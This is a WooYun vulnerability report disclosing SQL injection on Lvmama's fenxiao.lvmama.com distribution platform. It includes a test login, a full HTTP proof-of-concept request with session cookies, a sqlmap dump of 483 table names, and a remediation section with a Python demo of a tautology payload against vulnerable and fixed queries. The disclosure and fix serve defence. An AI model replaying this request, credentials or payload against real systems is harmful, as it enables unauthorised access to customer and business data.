
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0143109

Title: SQL injection on a Lvmama Tourism site (DBA privileges / 20 databases)

Vendor: Lvmama Tourism (驴妈妈旅游网)

Author: 路人甲 (anonymous)

Submitted: 2015-09-24 10:26

Fix time: 2015-11-08 10:52

Public disclosure: 2015-11-08 10:52

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-09-24: Details sent to the vendor, awaiting vendor handling
2015-09-24: Vendor confirmed; details visible to the vendor only
2015-10-04: Details opened to core white hats and relevant domain experts
2015-10-14: Details opened to regular white hats
2015-10-24: Details opened to intern white hats
2015-11-08: Details opened to the public

Brief description:

233333

Details:

The Lvmama distribution platform (fenxiao.lvmama.com) has a SQL injection.

[screenshot: 登陆.png (login page)]


Log in with 123456/123456 and open the injection page.

[screenshot: 注入页面.png (injection page)]


Proof of vulnerability:

POST /api/wx/adsend_list.jsp HTTP/1.1
Host: fenxiao.lvmama.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://fenxiao.lvmama.com/api/wx/adsend_list.jsp
Cookie: uid=wKgKcFYCKIYO5y3EBiWJAg==; CoreID6=31035080103514429822001&ci=90409730; __utma=30114658.668587984.1442982203.1442982203.1442982203.1; __utmz=30114658.1442982203.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Hm_lvt_cb09ebb4692b521604e77f4bf0a61013=1442982203; tma=30114658.15709036.1442982214458.1442982214458.1442982214458.1; tmd=2.30114658.15709036.1442982214458.; bfd_g=8a7bc81f66bd068d00000d6800522f5955b9c4a4; _lvTrack_UUID=EC5FD902-8675-4D0B-839C-61604B7CFCF6; __xsptplus443=443.1.1442982351.1442982351.1%234%7C%7C%7C%7C%7C%23%230t256dYDWHuIjbJceH1Nm1zA8T-Ejs2i%23; JSESSIONID=ecD-a_OBwBtb; dc4e01dbca1cd374ffb9068b31380fc2=Hb0l2XklSPjZXd0N2XklTP4ITNxgCOpZ1c39GaslTZw0mJ1N3cfRHdwlTZy0mJfd3YzVFdp9DZy0TNwAjMmcXdlNlcu9WYl1WPhFSYpZ1cn9mc19Dcw0mJzl2XpR3c9ASMkZlYs9War5XPhNXYxMCNyZ2blx2XklTPmMXdlNlcp9DZx0jM0MTNmY
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 78

sdate=2015-09-24&edate=2015-09-24&key=12345&order=+a.create_date+desc&pageNo=1


The key parameter is the injection point. (The order parameter in the same request carries a raw SQL fragment, a.create_date desc; the report does not test it, but a value that is spliced into ORDER BY cannot be protected by bind variables alone and needs its own allow-list check.)

[screenshot: 注入点.png (injection point)]


DBA privileges (as reported by sqlmap's --is-dba; on Oracle this can be confirmed by hand with SELECT granted_role FROM user_role_privs)

[screenshot: dba.png]


20 databases involved (on Oracle, what sqlmap lists as "databases" are schemas; with the DBA role the application account can read every one of them)

[screenshot: 20个库.png (20 databases)]


The current database has nearly 500 tables (sqlmap counts 483):

web application technology: Apache
back-end DBMS: Oracle
Database: SAAS14
[483 tables]
+--------------------------------+
| AD_CONTENT |
| AD_PAGE |
| AD_SEAT |
| AD_SEAT_IMG |
| AD_SEAT_LINK |
| ALITRIP_HOTEL |
| ALITRIP_HOTEL_LOG |
| ALITRIP_HOTEL_ORDER |
| ALITRIP_HOTEL_ORDER_LOG |
| ALITRIP_HOTEL_PRODUCT |
| ALITRIP_HOTEL_PROD_LOG |
| ALITRIP_HOTEL_PROD_SYNC_LOG |
| ALITRIP_MENPIAO_LOG |
| ALITRIP_MENPIAO_NEWLOG |
| ALITRIP_MENPIAO_ORDER |
| ALITRIP_MENPIAO_PRODUCT |
| ALITRIP_MENPIAO_RECEIVE |
| ALITRIP_ROOMTYPE |
| B2B_CHANNEL_PRICE |
| B2B_CHANNEL_PRICE_DAY |
| B2B_DEALER |
| B2B_DEALER_DAY |
| B2B_DEALER_LOG |
| B2B_FREETRAVEL |
| B2B_GRADE_PRICE |
| B2B_ORDER_REPORT |
| B2B_PACKAGE |
| B2B_SQPRICE |
| B2B_SQPRICE_DETAIL |
| B2B_TICKET |
| B2B_TICKET_2012 |
| B2B_TICKET_2013 |
| B2B_TICKET_AIRPORT |
| B2B_TICKET_BD |
| B2B_TICKET_CHANGE |
| B2B_TICKET_CHANGE_DETAIL |
| B2B_TICKET_CODE |
| B2B_TICKET_COND |
| B2B_TICKET_CONFIRM_LOG |
| B2B_TICKET_DETAIL |
| B2B_TICKET_DETAIL_2012 |
| B2B_TICKET_DETAIL_2013 |
| B2B_TICKET_EX |
| B2B_TICKET_FINISH_LOG |
| B2B_TICKET_HIS |
| B2B_TICKET_LOG |
| B2B_TICKET_PEOPLE |
| B2B_TICKET_STARTINFO |
| B2B_TICKET_TRAFFIC |
| B2C_CHANNEL_PRICE |
| B2C_TAOBAO_CONFIG |
| B2C_TAOBAO_LOG |
| B2C_TAOBAO_NOTIFYRECEIVEMSG |
| B2C_TAOBAO_ORDER |
| B2C_TAOBAO_ORDER_LOG |
| B2C_TAOBAO_PRODUCT |
| BANK_CITYCODE |
| BILL_TO_UFSOFT |
| CM_CHANNEL_PRICE |
| CM_ORDER_LOG |
| CM_PAY_BALANCE |
| CM_PAY_DRAWMONEY |
| CM_PAY_DRAWMONEY_LOG |
| CM_PAY_MONEY_LOG |
| CM_PAY_ORDER_LOG |
| CM_PROD_LOG |
| CM_SYNC_LOG |
| CM_SYNC_PROD_LOG |
| CM_USER |
| CM_USER_INFO |
| CRUEL_CODE_CUST |
| CRUEL_CODE_LIST |
| CRUEL_CODE_LOG |
| CRUEL_CODE_MESSAGE |
| CRUEL_CODE_POS |
| CRUEL_CODE_VERIFY |
| CRUEL_EXP_CODE |
| CRUEL_EXP_LIST |
| CTRIPTICKET_ORDER_LOG |
| CUSTVIEW_INFO |
| CUST_BALANCE_LOG |
| CUST_INFO_GROUP_CHANNEL |
| CUST_VIEW_INFO |
| DIY_MDD |
| DIY_MDD_TYPE |
| DIY_REL_MDD_PROD |
| EXPCODE_DETAIL |
| EXPCODE_LIST |
| GROUP_INFO |
| GROUP_INFO_2ND |
| GROUP_INFO_DETAIL_2ND |
| GROUP_INFO_ORDER |
| GROUP_ORDER |
| GROUP_ORDER_PEOPLE |
| GROUP_SET |
| GROUP_YY_ORDER |
| GROUP_YY_ORDER_COND |
| GROUP_YY_ORDER_DETAIL |
| GROUP_YY_ORDER_LOG |
| GROUP_YY_ORDER_PEOPLE |
| GRP_CHANNEL_PRICE |
| GRP_GRADE_PRICE |
| GRP_ORDER |
| GRP_ORDER_DETAIL |
| GRP_TICKET |
| GRP_TICKET_PRICE |
| HOTEL_WEEKSHOW |
| IMP_CODE |
| IMP_CODE_DETAIL |
| IMP_CODE_LIST |
| INFO_AIRPORT |
| INFO_AIRPORT_FLIGHT |
| INFO_AIRPORT_NUM |
| INFO_AIRPORT_NUM_LIST |
| INFO_AIRPORT_PRICE |
| INFO_AIRPORT_SEAT |
| INFO_AUTO_PRICE |
| INFO_CAR |
| INFO_CAR_TYPE |
| INFO_CATALOG |
| INFO_COMMENT |
| INFO_CONDS |
| INFO_CTRIPTICKET |
| INFO_FREETRAVEL |
| INFO_FREETRAVEL_TREE |
| INFO_GROUP |
| INFO_GROUP_DETAIL |
| INFO_HOTEL |
| INFO_HOTEL_NUM |
| INFO_HOTEL_PRICE |
| INFO_HOTEL_SET |
| INFO_INSURANCE |
| INFO_INSURANCE_LOG |
| INFO_INSURANCE_ORDER |
| INFO_JD |
| INFO_MEITUAN |
| INFO_NEWS |
| INFO_NEWS_READLOG |
| INFO_PLAN_PRICE |
| INFO_PROD |
| INFO_QUNAR_VIEW |
| INFO_TB_PRICE |
| INFO_TICKET |
| INFO_TICKET_CANCEL |
| INFO_TICKET_COND |
| INFO_TICKET_CUST |
| INFO_TICKET_DETAIL |
| INFO_TICKET_EX |
| INFO_TICKET_MAILTEMP |
| INFO_TICKET_NUM |
| INFO_TICKET_NUM_FOREX |
| INFO_TICKET_PRICE |
| INFO_TICKET_PRICE_FOREX |
| INFO_TICKET_REL |
| INFO_TICKET_RELAREA |
| INFO_TICKET_RELCAT |
| INFO_TICKET_RELVIEW |
| INFO_TICKET_REL_CUST |
| INFO_TOGO |
| INFO_TRAFFIC_NUM_LIST |
| INFO_TRAFFIC_PLACE |
| INFO_TRAFFIC_PRICE |
| INFO_TRAFFIC_SEAT |
| INFO_TRAFFIC_STATION |
| INFO_TRAFFIC_TIMES |
| INFO_TRAVEL |
| INFO_TRAVEL_CYCLE |
| INFO_TRAVEL_CYCLE_AUTO |
| INFO_TRAVEL_JOURNEY |
| INFO_TRAVEL_PRICE |
| INFO_TRAVEL_SEAT |
| INFO_VENUE |
| INFO_VENUE_NUM |
| INFO_VISA |
| INTERFACE_AILVTONG_LOG |
| INTERFACE_AIZHAOPIAO_LOG |
| INTERFACE_BEIZHU_LOG |
| INTERFACE_CAIHUISHIJIE_LOG |
| INTERFACE_CHANGLU_LOG |
| INTERFACE_CHANGLV_LOG |
| INTERFACE_CHANGYOUTONG_LOG |
| INTERFACE_CTRIP_HOLIDAY |
| INTERFACE_DADONGRT_LOG |
| INTERFACE_DDRT_LOG |
| INTERFACE_DIANPING_LOG |
| INTERFACE_DMZH_LOG |
| INTERFACE_DUMUQIAO_LOG |
| INTERFACE_FURONGYUAN_LOG |
| INTERFACE_FZG_BIZZONE |
| INTERFACE_GLYD |
| INTERFACE_HKDISNEY_LOG |
| INTERFACE_HOTEL |
| INTERFACE_HOTEL_BE_PRODUCT |
| INTERFACE_HOTEL_DDS_LOG |
| INTERFACE_HOTEL_DDS_ORDER_LOG |
| INTERFACE_HOTEL_JL |
| INTERFACE_HOTEL_JL_LOG |
| INTERFACE_HOTEL_JL_ORDER_LOG |
| INTERFACE_HOTEL_LTJL_LOG |
| INTERFACE_HOTEL_LTJL_ORDER_LOG |
| INTERFACE_HOTEL_LTJL_PRODUCT |
| INTERFACE_HOTEL_LYY_ORDER_LOG |
| INTERFACE_HOTEL_PRODUCT |
| INTERFACE_HOTEL_XH_LOG |
| INTERFACE_HOTEL_XH_ORDER_LOG |
| INTERFACE_HOTEL_XH_PRODUCT |
| INTERFACE_HUANQIU_LOG |
| INTERFACE_HUANTAOYOU_LOG |
| INTERFACE_HUAXIAPIAOLIAN_LOG |
| INTERFACE_IHUIU_LOG |
| INTERFACE_IMAGECO |
| INTERFACE_IMAGECO_CUST |
| INTERFACE_JD_CHANNEL_LOG |
| INTERFACE_JD_COUPON_PWD |
| INTERFACE_JIDIAOTONG_LOG |
| INTERFACE_KUIYUAN_LOG |
| INTERFACE_KUXIU_LOG |
| INTERFACE_LEXIAOXIANG_LOG |
| INTERFACE_LINE |
| INTERFACE_LINGNAN_LOG |
| INTERFACE_LIULIUKA_LOG |
| INTERFACE_LLK_CODE |
| INTERFACE_LLK_CUST |
| INTERFACE_LOG |
| INTERFACE_LONG |
| INTERFACE_LVMAMA_LOG |
| INTERFACE_MAP |
| INTERFACE_MEITUAN_DETAIL |
| INTERFACE_MEITUAN_LOG |
| INTERFACE_MJLD_LOG |
| INTERFACE_MOUNTWG_LOG |
| INTERFACE_MTS |
| INTERFACE_MTS_LOG |
| INTERFACE_PIAOFUTONG_LOG |
| INTERFACE_PIAOGJ_LOG |
| INTERFACE_PIAOGONGCHANG_LOG |
| INTERFACE_PIAOWUBA_LOG |
| INTERFACE_PIAOZHIJIA_LOG |
| INTERFACE_PRICE_RULE |
| INTERFACE_PROD_SYNC_LOG |
| INTERFACE_QUNAR |
| INTERFACE_QUNAR_HISTORY_LOG |
| INTERFACE_QUNAR_HOLIDAY |
| INTERFACE_QUNAR_HOLIDAY_LOG |
| INTERFACE_QUNAR_HOTEL |
| INTERFACE_QUNAR_HOTEL_LOG |
| INTERFACE_QUNAR_INVOICE |
| INTERFACE_QUNAR_LINE_LOG |
| INTERFACE_QUNAR_LOG |
| INTERFACE_QUNAR_MOVE |
| INTERFACE_QUNAR_SUPPLIER_LOG |
| INTERFACE_SHANHAIGUAN_LOG |
| INTERFACE_SXLY |
| INTERFACE_SYNC_LOG |
| INTERFACE_TIANGUI_LOG |
| INTERFACE_TIANKE_LOG |
| INTERFACE_TICKET |
| INTERFACE_TONGCHENG_LOG |
| INTERFACE_TOURMART_LOG |
| INTERFACE_VISITBEIJING_LOG |
| INTERFACE_WULONG_LOG |
| INTERFACE_XIECHENG_LOG |
| INTERFACE_XINAIMOKE_LOG |
| INTERFACE_YANGGUANGLZ_LOG |
| INTERFACE_YINLVTONG_LOG |
| INTERFACE_YUANFAN_LOG |
| INTERFACE_YYJQ_LOG |
| INTERFACE_ZHONGJINGXIN_LOG |
| JOURNEY |
| JOURNEY_COMMENT |
| JOURNEY_DETAIL |
| JOURNEY_PRO_DETAIL |
| LVMAMA_CHUANHUO_LOG |
| LVMAMA_PRODUCT_INFO |
| LVMAMA_PRODUCT_LIST |
| LVMAMA_PUSH_LOG |
| LVMAMA_UPDATE_FLAG |
| LVMAMA_VIEW |
| LVMAMA_VIEW_INFO |
| LVWUTONGCODE_QUEUE |
| LVWUTONG_SMSMODE |
| LVWUTONG_TMPCODE |
| LVWUTONG_TMPCODE_GROUP |
| LVWUTONG_TMPCODE_LOG |
| LVWUTONG_TMPCODE_USE |
| ONLINE_DEBUG_LOG |
| ORDER_ABNORMAL_LOG |
| ORDER_CHANGE_LOG |
| ORDER_LOG |
| ORDER_RELATION_LOG |
| PAY_BALANCE |
| PAY_CREDIT_FEE |
| PAY_DRAWMONEY |
| PAY_MOMEY_LOG |
| PAY_ORDER_LOG |
| PLAN_TABLE |
| QUNAR_PRICE_CACHE |
| RECE_APP |
| RECE_APP_DETAIL |
| RECE_PAYMENT_DETAIL |
| RECE_PAYMENT_LIST |
| RECE_STATEMENT_LIST |
| RUPD$_B2B_SETTLE_METHOD |
| RUPD$_B2B_TICKET |
| RUPD$_B2B_TICKET_DETAIL |
| RUPD$_HOTEL_BRAND |
| RUPD$_HOTEL_DISTRICT |
| RUPD$_HOTEL_INFO |
| RUPD$_INFO_AREA |
| RUPD$_INFO_AREA_EX |
| RUPD$_INFO_BANK |
| RUPD$_INFO_CAR |
| RUPD$_INFO_CONDS |
| RUPD$_INFO_HOTEL |
| RUPD$_INFO_NEWS |
| RUPD$_INFO_PROD |
| RUPD$_INFO_TICKET |
| RUPD$_INFO_TICKET_CANCEL |
| RUPD$_INFO_TICKET_COND |
| RUPD$_INFO_TICKET_DETAIL |
| RUPD$_INFO_TICKET_EX |
| RUPD$_INFO_TICKET_PRICE |
| RUPD$_INFO_TICKET_RELAREA |
| RUPD$_INFO_TICKET_RELVIEW |
| RUPD$_INFO_TRAVEL |
| RUPD$_INFO_VISA |
| RUPD$_INFO_VISA_SORT |
| RUPD$_INTERFACE_LLK_CUST |
| RUPD$_SAAS_PERMISSION |
| RUPD$_SAAS_USER_INFO |
| RUPD$_TB_USR_INFO |
| RUPD$_TB_VIEW_INFO |
| RUPD$_USR_TAG |
| RUPD$_USR_VIEW |
| SAAS_AREA_SUB |
| SAAS_BUY_LOG |
| SAAS_CLUSTER |
| SAAS_DATAMAN |
| SAAS_INFO_AREA |
| SAAS_INFO_SUB |
| SAAS_NEWS |
| SAAS_NEWS_SORT |
| SAAS_NOTICE |
| SAAS_ORDER_SOURCE |
| SAAS_PAY_DRAWMONEY |
| SAAS_PAY_DRAWMONEY_LOG |
| SAAS_PAY_PRODUCT_TYPE |
| SAAS_PAY_SERVICE |
| SAAS_TABLE_SQL |
| SAAS_VAP_ORDER |
| SAAS_VAP_PRODUCT |
| SAAS_VIEW_SUB |
| SETTLE_ACCOUNT |
| SETTLE_PAYABLE |
| SETTLE_PAYABLE_DETAIL |
| SETTLE_PAYABLE_LIST |
| SETTLE_PAYAPP |
| SETTLE_PAYAPP_DETAIL |
| SETTLE_STATEMENT_DETAIL |
| SETTLE_STATEMENT_LIST |
| SITE_IP2 |
| SMS_CONSUME_LOG |
| SMS_GETMONEY_LOG |
| STOCK_ADD_LOG |
| STOCK_REPORT_DAY |
| SYS_CURRENCY_RATE |
| SYS_FEE_LOG |
| SYS_REFER |
| SYS_REPORT_DAY |
| SYS_SMS_LOG |
| SYS_SQL_HISTORY |
| SYS_SQL_QUEUE |
| TB_CONSUME_CODE |
| TB_RECEIVE_LOG |
| TEST_DB |
| TOUREASY_AREA |
| TOUREASY_LINE |
| TOUREASY_ORDER_INFO_PINGZHENG |
| TOUREASY_ORDER_QUEUE |
| TOUREASY_PRODUCT |
| TOUREASY_USR_LOG |
| TOUR_GUIDE |
| TRAFFIC_TO_TICKET |
| T_EQUIP |
| T_EQUIPSUB |
| T_LANDMARK |
| T_MATERIA |
| T_PRO_COMMON_NUM |
| T_PRO_COMMON_PRICE |
| T_PRO_DETAIL_COURSE |
| T_REGIONS |
| T_REGIONS_QD |
| T_REGIONS_SUBWAY |
| T_SPORTTYPE |
| T_VENUE |
| T_VENUE_COUNT |
| T_VENUE_PRICE |
| T_VENUE_RECORD |
| T_VENUE_SUB |
| UF_SOFT_QUEUE |
| UF_SOFT_SETTLE_PAYABLE |
| UF_SOFT_USR_CREDIT_LOG |
| UNIONPAY_CONFIG |
| UNIONPAY_TRADE_LOG |
| UPDATE_FOREXPRICE_LOG |
| USR_ACCOUNT |
| USR_ACCOUNT_LOG |
| USR_ACCOUNT_SET |
| USR_ATTENTION |
| USR_BALANCE_LOG |
| USR_BOOK |
| USR_CHECKIN_TYPE |
| USR_CREDIT |
| USR_CREDIT_LOG |
| USR_DEALER |
| USR_DEPT |
| USR_DIST |
| USR_DOCUMENT_TEMP |
| USR_ENTERPRISE_TAG |
| USR_GETPASS_LOG |
| USR_GRADE |
| USR_HOTEL_COND |
| USR_INFO |
| USR_INFO_B2C |
| USR_INFO_EXPRESS |
| USR_INTERFACE |
| USR_INTERFACE_INFO |
| USR_LOG |
| USR_LOGIN |
| USR_LOGIN_LOG |
| USR_LOG_2011 |
| USR_LOG_2012 |
| USR_LOG_2013 |
| USR_MAILTEMP_LIST |
| USR_MANAGER_USER |
| USR_MEMBER |
| USR_MENU |
| USR_MSG |
| USR_MSG_COMMENT |
| USR_MSG_MONEY |
| USR_PAGES |
| USR_POWER_AREA |
| USR_PRINT_TEMP |
| USR_PROD_CODE |
| USR_PROD_WHILE_AREA |
| USR_PROD_WHILE_DETAIL |
| USR_PROD_WHILE_GROUP |
| USR_PROD_WHILE_LIST |
| USR_PROD_WHILE_TREE |
| USR_SCORE |
| USR_SCORE_DETAIL |
| USR_SCORE_LOG |
| USR_SCORE_RULE |
| USR_VIEW_BAK |
| USR_VIEW_BOUNTY |
| USR_VIEW_COLUMN |
| USR_VIEW_COPY |
| USR_VIEW_LINK |
| USR_VIEW_MSG |
| USR_VIEW_MSG_HIS |
| USR_VIEW_NAV |
| USR_VIEW_PAGE |
| USR_VIEW_TEMPLATE |
| WX_AD |
| WX_AD_DETAIL |
| WX_AD_SEND_LOG |
| WX_KEY |
| WX_MSG |
| WX_MSG_TEMP |
| WX_ORDER_TASK |
| WX_SCENE |
| WX_SCENE_IN |
| WX_SCENE_LOG |
| WX_SEND_HISTORY |
| WX_SEND_QUEUE |
| WX_SET |
| WX_TREE |
| WX_USER_INFO |
| XIECHENG_HOTEL_INFO |
| XIECHENG_HOTEL_LOG |
| XIECHENG_HOTEL_ORDER |
| XIECHENG_HOTEL_STATE |
| INTERFACE_KUIYUAN_LOG |
+--------------------------------+


A large amount of data; the other databases certainly contain distributor information, so I stopped there.

[screenshot: 数据.png (data)]

Fix:

Filter input. Concretely: pass sdate, edate and key to the query as bind variables (PreparedStatement placeholders in JSP/JDBC) instead of concatenating them into the SQL text, and validate the order parameter against an allow-list of sortable columns, since an ORDER BY expression cannot be bound. The application account should also lose the DBA role and keep only the rights the distribution platform needs; that role is what turns a single injection into read access across all 20 schemas.
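The fix above, worked through as an added example that is not part of the original report or of Lvmama's code. It is Python against an in-memory SQLite database standing in for the Oracle backend (the ? placeholder syntax is the same one a JDBC PreparedStatement uses). The table name WX_AD_SEND_LOG is taken from the table list above; its columns, the query shape and the sample rows are constructed assumptions. The example contrasts the concatenated query the report implies with the bound version, and applies an allow-list to the order parameter.

```python
import sqlite3

# Constructed stand-in data. The real target is Oracle; sqlite3 is used only so this runs
# offline. WX_AD_SEND_LOG appears in the report's table list; the columns are assumptions.
SAMPLE_ROWS = [
    (1, "12345", "2015-09-24", "sent"),
    (2, "99999", "2015-09-24", "sent"),
    (3, "12345", "2015-09-23", "failed"),
]

# Columns a client may sort on; anything else is rejected. ORDER BY cannot be passed as a
# bind variable, so an allow-list is the only safe way to accept it from the request.
ALLOWED_ORDER = {"create_date", "status"}


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE WX_AD_SEND_LOG (id INTEGER, ad_key TEXT, create_date TEXT, status TEXT)"
    )
    conn.executemany("INSERT INTO WX_AD_SEND_LOG VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def adsend_list_vulnerable(conn, sdate, edate, key, order):
    # The pattern the report implies: request parameters pasted straight into the SQL text.
    sql = (
        "SELECT id, ad_key, create_date, status FROM WX_AD_SEND_LOG a "
        f"WHERE a.create_date BETWEEN '{sdate}' AND '{edate}' AND a.ad_key = '{key}' "
        f"ORDER BY {order}"
    )
    return conn.execute(sql).fetchall()


def parse_order(order):
    # Accept "col [asc|desc]" only when col is allow-listed; return a safe SQL fragment.
    parts = order.strip().split()
    if not 1 <= len(parts) <= 2:
        raise ValueError("bad order")
    col = parts[0].split(".")[-1].lower()  # tolerate the "a." alias prefix seen in the request
    direction = parts[1].lower() if len(parts) == 2 else "asc"
    if col not in ALLOWED_ORDER or direction not in ("asc", "desc"):
        raise ValueError("bad order")
    return f"a.{col} {direction}"


def adsend_list_fixed(conn, sdate, edate, key, order):
    # Data values travel as bind variables; only the allow-listed ORDER BY is interpolated.
    sql = (
        "SELECT id, ad_key, create_date, status FROM WX_AD_SEND_LOG a "
        "WHERE a.create_date BETWEEN ? AND ? AND a.ad_key = ? "
        f"ORDER BY {parse_order(order)}"
    )
    return conn.execute(sql, (sdate, edate, key)).fetchall()


def demo():
    # Returns (rows for a benign key on the vulnerable query,
    #          rows for a tautology payload on the vulnerable query,
    #          rows for the same payload on the fixed query).
    conn = open_db()
    order = " a.create_date desc"          # the value sent in the report's request
    payload = "x' OR '1'='1"               # classic tautology placed in the key parameter
    benign = adsend_list_vulnerable(conn, "2015-09-24", "2015-09-24", "12345", order)
    attacked = adsend_list_vulnerable(conn, "2015-09-24", "2015-09-24", payload, order)
    fixed = adsend_list_fixed(conn, "2015-09-24", "2015-09-24", payload, order)
    return len(benign), len(attacked), len(fixed)


if __name__ == "__main__":
    print(demo())  # (1, 3, 0): the payload widens the vulnerable query to every row, the bound one matches nothing
```

The tautology turns the vulnerable WHERE clause into `(... AND a.ad_key = 'x') OR '1'='1'`, so every row comes back; with the value bound it is compared literally and matches nothing. parse_order rejects anything that is not an allow-listed column with an optional asc/desc, which is the only defence available for the order parameter.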

Copyright notice: when reproducing, credit 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-09-24 10:51

Vendor reply:

Someone already reported this earlier, thanks.

Latest status:

None yet

